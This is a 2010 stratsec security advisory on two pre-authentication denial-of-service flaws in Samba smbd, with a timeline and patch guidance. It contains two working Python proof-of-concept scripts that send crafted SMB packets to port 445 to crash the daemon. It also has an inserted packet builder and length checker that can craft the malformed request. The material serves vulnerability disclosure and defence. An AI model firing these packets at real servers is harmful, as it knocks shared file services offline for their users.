===============================================================================
stratsec Security Advisory: SS-2010-005
===============================================================================

Title: Samba Multiple DoS Vulnerabilities
Version: 1.0
Issue type: Multiple
Affected vendor: Samba
Release date: 12/05/2010
Discovered by: Laurent Gaffié
Issue status: Patch available

===============================================================================

Summary
-------

Two vulnerabilities were discovered in the Samba smbd daemon which allow a
remote attacker to trigger a null pointer dereference or an uninitialised
variable read by sending a crafted 'Session Setup AndX' request. Successful
exploitation of either issue results in a denial of service: the smbd process
handling the connection crashes.

Description
-----------

The Server Message Block (SMB) protocol, also known as Common Internet File
System (CIFS), is an application-layer protocol that provides shared access to
files, printers and Inter-Process Communication (IPC). It is also a transport
for Distributed Computing Environment / Remote Procedure Call (DCE/RPC)
operations. After the dialect has been negotiated ('Negotiate Protocol'), the
client sends a 'Session Setup AndX' request to set up a session (this is the
authentication step) so that it can then connect to a specific share.

To trigger the null pointer dereference, the client sends a crafted
'Negotiate Protocol' request with the SMB header field 'Flags2' set to 0x0003
(Unicode bit 0x8000 clear), followed by a 'Session Setup AndX' request with
'Flags2' set to 0x8003 (Unicode bit set). This sequence crashes the smbd
process.

The uninitialised variable read is triggered by a crafted 'Session Setup AndX'
request in its extended security form whose 'security blob length' field is
set to 0xffff (the two bytes '\xff\xff'), a value far larger than the data
actually carried in the request.

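The two requests described above are built and checked below in an added example (written for this edit; it is not stratsec's or Samba's code). It assembles the NetBIOS/SMB1 framing and the 'Negotiate Protocol' and 'Session Setup AndX' messages from named fields instead of raw hex, and then applies the check a careful server must perform on every length field (SecurityBlobLength, the legacy password lengths, AndXOffset) before trusting it: each one has to fit inside the bytes actually received, so a SecurityBlobLength of 0xffff in a 177-byte request is rejected instead of being read. It also flags the Unicode-bit disagreement between the negotiate and session-setup headers that the null pointer sequence relies on, which is useful for a detection rule. The NTLMSSP blob and the dialect list are constructed sample values; the constants 0xcafe, 0x1104, 0x32 and 0xa00000d4 mirror the PID, MaxBufferSize, MaxMpxCount and Capabilities the proof-of-concept scripts below send.

```python
"""SMB1 Negotiate / Session Setup AndX builder and length checker.
Added example for this advisory, not stratsec's or Samba's code. Field layouts are the
SMB1 (CIFS) wire format the two proof-of-concept scripts below emit as raw bytes;
NTLMSSP_NEGOTIATE is a constructed sample security blob."""
import struct

SMB_COM_NEGOTIATE = 0x72
SMB_COM_SESSION_SETUP_ANDX = 0x73
FLAGS2_EXTENDED_SECURITY = 0x0800
FLAGS2_UNICODE = 0x8000
SMB_MAGIC = b'\xffSMB'
# 32-byte header: magic, command, status, flags, flags2, pid_high, signature(8),
# reserved, tid, pid, uid, mid
HDR_FMT = '<4sBIBHH8sHHHHH'
NTLMSSP_NEGOTIATE = b'NTLMSSP\x00\x01\x00\x00\x00\x07\x82\x08\xa2' + b'\x00' * 16  # constructed

def nbss(smb):
    """NetBIOS session message: type byte 0x00 followed by a 24-bit length."""
    return struct.pack('>I', len(smb)) + smb

def smb1_header(command, flags2, pid=0xcafe, uid=0, mid=0):
    return struct.pack(HDR_FMT, SMB_MAGIC, command, 0, 0x18, flags2, 0,
                       b'\x00' * 8, 0, 0, pid, uid, mid)

def negotiate_request(dialects, flags2):
    """SMB_COM_NEGOTIATE: WordCount 0, ByteCount, then 0x02-tagged NUL-terminated dialects."""
    data = b''.join(b'\x02' + d + b'\x00' for d in dialects)
    return nbss(smb1_header(SMB_COM_NEGOTIATE, flags2) + struct.pack('<BH', 0, len(data)) + data)

def session_setup_andx(blob, flags2, blob_length=None):
    """Extended-security SMB_COM_SESSION_SETUP_ANDX (WordCount 12). blob_length overrides
    the SecurityBlobLength field so the request can claim more blob bytes than it carries."""
    if blob_length is None:
        blob_length = len(blob)
    words = struct.pack('<BBHHHHIHII',
                        0xff, 0, 0,        # AndXCommand (none), AndXReserved, AndXOffset
                        0x1104, 0x32, 0,   # MaxBufferSize, MaxMpxCount, VcNumber
                        0, blob_length,    # SessionKey, SecurityBlobLength
                        0, 0xa00000d4)     # Reserved, Capabilities
    return nbss(smb1_header(SMB_COM_SESSION_SETUP_ANDX, flags2)
                + struct.pack('<B', 12) + words + struct.pack('<H', len(blob)) + blob)

def parse_smb1(pkt):
    """Strip the NBSS frame and parse the SMB1 header. Returns (header dict, body bytes)."""
    if len(pkt) < 4 + 32:
        raise ValueError('frame too short for an SMB1 header')
    nb_len = struct.unpack('>I', pkt[:4])[0] & 0x00ffffff
    smb = pkt[4:]
    if nb_len != len(smb):
        raise ValueError('NBSS length %d but %d bytes present' % (nb_len, len(smb)))
    fields = struct.unpack(HDR_FMT, smb[:32])
    if fields[0] != SMB_MAGIC:
        raise ValueError('not an SMB1 message')
    flags2 = fields[4]
    return ({'command': fields[1], 'flags2': flags2,
             'unicode': bool(flags2 & FLAGS2_UNICODE),
             'ext_sec': bool(flags2 & FLAGS2_EXTENDED_SECURITY)}, smb[32:])

def check_session_setup(pkt):
    """Validate a Session Setup AndX request as a careful server must: every length or
    offset field has to fit inside the bytes actually received.
    Returns ('ok', security_blob) or ('reject', reason)."""
    hdr, body = parse_smb1(pkt)
    if hdr['command'] != SMB_COM_SESSION_SETUP_ANDX:
        return 'reject', 'not a Session Setup AndX request'
    if len(body) < 3:
        return 'reject', 'WordCount/ByteCount missing'
    wc = body[0]
    if len(body) < 3 + 2 * wc:
        return 'reject', 'WordCount %d runs past the message' % wc
    words = body[1:1 + 2 * wc]
    bcc = struct.unpack_from('<H', body, 1 + 2 * wc)[0]
    data = body[3 + 2 * wc:]
    if bcc != len(data):
        return 'reject', 'ByteCount %d but %d data bytes present' % (bcc, len(data))
    if wc not in (12, 13):
        return 'reject', 'unexpected WordCount %d' % wc
    andx_cmd, _, andx_off = struct.unpack_from('<BBH', words, 0)
    if andx_cmd != 0xff and andx_off >= 32 + len(body):   # offset is from the SMB header start
        return 'reject', 'AndXOffset %d points past the message' % andx_off
    if wc == 13:   # legacy form: OEMPasswordLen and UnicodePasswordLen at word offsets 14 and 16
        oem_len, uni_len = struct.unpack_from('<HH', words, 14)
        if oem_len + uni_len > bcc:
            return 'reject', 'password lengths %d+%d exceed ByteCount %d' % (oem_len, uni_len, bcc)
        return 'ok', b''
    blob_len = struct.unpack_from('<H', words, 14)[0]   # SecurityBlobLength
    if blob_len > bcc:
        # The advisory's 0xffff case: copying blob_len bytes would run past ByteCount.
        return 'reject', 'SecurityBlobLength %d exceeds ByteCount %d' % (blob_len, bcc)
    return 'ok', data[:blob_len]

def unicode_flag_consistent(nego_pkt, sess_pkt):
    """Detection helper for the null pointer sequence described above: True when the
    Negotiate Protocol and Session Setup AndX headers agree on the FLAGS2 Unicode bit."""
    return parse_smb1(nego_pkt)[0]['unicode'] == parse_smb1(sess_pkt)[0]['unicode']

if __name__ == '__main__':
    print(check_session_setup(session_setup_andx(NTLMSSP_NEGOTIATE, 0xc807)))
    print(check_session_setup(session_setup_andx(NTLMSSP_NEGOTIATE, 0xc807, blob_length=0xffff)))
    print(unicode_flag_consistent(negotiate_request([b'NT LM 0.12'], 0x0003),
                                  session_setup_andx(NTLMSSP_NEGOTIATE, 0x8003)))
```

The same two builders can be pointed at a test host with the socket code of the proof-of-concept scripts if you want to reproduce the advisory against a vulnerable lab build; the checker side is what a server (or an IDS reassembling port 445 traffic) should apply, and it is the missing "does the advertised length fit in the received bytes" comparison that turns a malformed length into a crash rather than a rejected request.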
Impact
------

A remote attacker can crash the Samba smbd daemon, causing a denial of
service. No credentials are required: both crafted requests are sent during
session setup, before any authentication has completed.

Affected products
-----------------

Samba <= 3.4.7 and Samba <= 3.5.1

Proof of concept
----------------

To trigger the null pointer dereference (a 'Negotiate Protocol' request with
Flags2 0x0003, followed by a 'Session Setup AndX' request with Flags2 0x8003
that chains a Tree Connect AndX, AndXCommand 0x75), the following Python
proof of concept is available:

import sys
import socket

if len(sys.argv) <= 1:
    sys.exit('Usage: python smbd.py 10.0.0.12')

host = (sys.argv[1], 445)

# SMB_COM_NEGOTIATE, Flags2 = 0x0003 (Unicode bit 0x8000 clear)
packetnego = (
    b"\x00\x00\x00\xaa"
    b"\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x03\x00\x00\x00\x00\x00"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfe\xca\x00\x00\x00\x00"
    b"\x00\x87\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50"
    b"\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x1a\x45\x4e\x49"
    b"\x58\x20\x43\x4f\x52\x45\x00\x02\x4d\x49\x43\x52\x4f\x53\x4f\x46"
    b"\x54\x20\x4e\x45\x54\x57\x4f\x52\x4b\x53\x20\x31\x2e\x30\x33\x00"
    b"\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00\x02\x57\x69\x6e\x64"
    b"\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75"
    b"\x70\x73\x20\x33\x2e\x31\x61\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30"
    b"\x30\x32\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e"
    b"\x54\x20\x4c\x4d\x20\x76\x2e\x31\x32\x00"
)

# SMB_COM_SESSION_SETUP_ANDX, Flags2 = 0x8003 (Unicode bit set), with a
# chained SMB_COM_TREE_CONNECT_ANDX (AndXCommand 0x75, AndXOffset 0x00d6)
payload = (
    b"\x00\x00\x01\xa3"
    b"\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x18\x03\x80\x00\x00\x00\x00"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    b"\x00\x41\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    b"\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfe\xca\x00\x00\x00"
    b"\x00\x0d\x75\x00\xd6\x00\x04\x11\x0a\x00\x00\x00\x00\x00\x00\x00"
    b"\x18\x00\x18\x00\x00\x00\x00\x00\xd4\x00\x00\x00\x99\x00\x36\xed"
    b"\x7f\xf4\x6b\xeb\x15\x65\x2e\xb5\xc9\x70\xbe\x39\xfa\x89\x56\x5b"
    b"\xb0\xc2\x56\x40\x11\x6c\xe6\x33\x1e\x93\x02\xd3\xd3\x2e\x17\xad"
    b"\x1f\x37\x23\xcf\x7e\x4c\xd7\x64\xbe\xd5\xdc\x1f\x23\xe0\x69\x41"
    b"\x00\x64\x00\x6d\x00\x69\x00\x6e\x00\x69\x00\x73\x00\x74\x00\x72"
    b"\x00\x61\x00\x74\x00\x65\x00\x75\x00\x72\x00\x00\x00\x4e\x00\x54"
    b"\x00\x34\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77"
    b"\x00\x73\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x31\x00\x33\x00\x38"
    b"\x00\x31\x00\x00\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f"
    b"\x00\x77\x00\x73\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x34\x00\x2e"
    b"\x00\x30\x00\x00\x00\x00\x00\x04\xff\x00\x00\x00\x00\x00\x01\x00"
    b"\x31\x00\x00\x5c\x00\x5c\x00\x31\x00\x39\x00\x32\x00\x2e\x00\x31"
    b"\x00\x36\x00\x38\x00\x2e\x00\x30\x00\x2e\x00\x31\x00\x30\x00\x34"
    b"\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x3f\x3f\x3f"
    b"\x3f\x3f\x00"
)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(host)
# Both requests are sent back-to-back; the negotiate response is not read.
s.sendall(packetnego)
s.sendall(payload)
s.close()

To trigger the uninitialised variable read (an extended security 'Session
Setup AndX' request whose security blob length field is 0xffff), the following
Python proof of concept is available:

import sys
import socket

if len(sys.argv) <= 1:
    sys.exit('Usage: python smbd.py 10.0.0.12')

host = (sys.argv[1], 445)

# SMB_COM_NEGOTIATE, Flags2 = 0xc853 (Unicode and extended security set)
packetnego = (
    b"\x00\x00\x00\x85"
    b"\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x53\xc8\x00\x00\x00\x00"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00"
    b"\x00\x62\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50"
    b"\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x4c\x41\x4e\x4d"
    b"\x41\x4e\x31\x2e\x30\x00\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66"
    b"\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e"
    b"\x31\x61\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
    b"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c\x4d\x20"
    b"\x30\x2e\x31\x32\x00"
)

# SMB_COM_SESSION_SETUP_ANDX, WordCount 12 (extended security form),
# Flags2 = 0xc807; ByteCount is 0x00b1 (177) but SecurityBlobLength is 0xffff
payload = (
    b"\x00\x00\x00\xec"
    b"\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x40\x00"
    b"\x0c\xff\x00\xec\x00\x04\x11\x32\x00\x00\x00\x00\x00\x00\x00"
    b"\xff\xff"  # SecurityBlobLength set to 0xffff here
    b"\x00\x00\x00\x00\xd4\x00\x00\xa0\xb1\x00\x60\x48\x06\x06\x2b"
    b"\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b"
    b"\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c"
    b"\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28"
    b"\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00"
    b"\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00"
    b"\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00"
    b"\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00"
    b"\x36\x00\x30\x00\x30\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00"
    b"\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00"
    b"\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x00\x00"
)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(host)
# Both requests are sent back-to-back; the negotiate response is not read.
s.sendall(packetnego)
s.sendall(payload)
s.close()

Solution
--------

Update to Samba 3.5.2 or 3.4.8 (http://samba.org/). Until the update is
applied, restricting which hosts can reach the SMB ports (TCP 139 and 445),
either at the firewall or with Samba's 'hosts allow' parameter, limits
exposure, since the crafted requests are sent before authentication.

Response timeline
-----------------

* 09/03/2010 - Null pointer dereference issue reported to vendor.
* 09/03/2010 - Vendor acknowledges receipt of the advisory 2 hours after
  receiving the initial email.
* 09/03/2010 - Vendor confirms the issue and provides a patch 3 hours after
  receiving the initial email.
* 09/03/2010 - stratsec confirms the patch resolves the issue.
* 15/03/2010 - Uninitialised variable read issue reported to vendor.
* 15/03/2010 - Vendor confirms the issue and provides a patch 5 hours after
  receiving the initial email.
* 15/03/2010 - stratsec confirms the patch resolves the issue.
* 07/04/2010 - Version 3.5.2 released by the vendor, fixing both issues.
* 11/05/2010 - Version 3.4.8 released by the vendor, fixing both issues.
* 12/05/2010 - This advisory published.

References
----------

* Vendor advisory: http://samba.org/samba/history/samba-3.4.8.html
* https://bugzilla.samba.org/show_bug.cgi?id=7254
* stratsec would like to thank the Samba Security Team for their
  responsiveness while handling these issues.

===============================================================================

About stratsec
--------------

stratsec specialises in providing information security consulting and testing
services for government and commercial clients. Established in 2004, we are
now one of the leading independent information security companies in the
Australasian and SE-Asian region, with offices throughout Australia and in
Singapore and Malaysia.

For more information, please visit our website at http://www.stratsec.net/

===============================================================================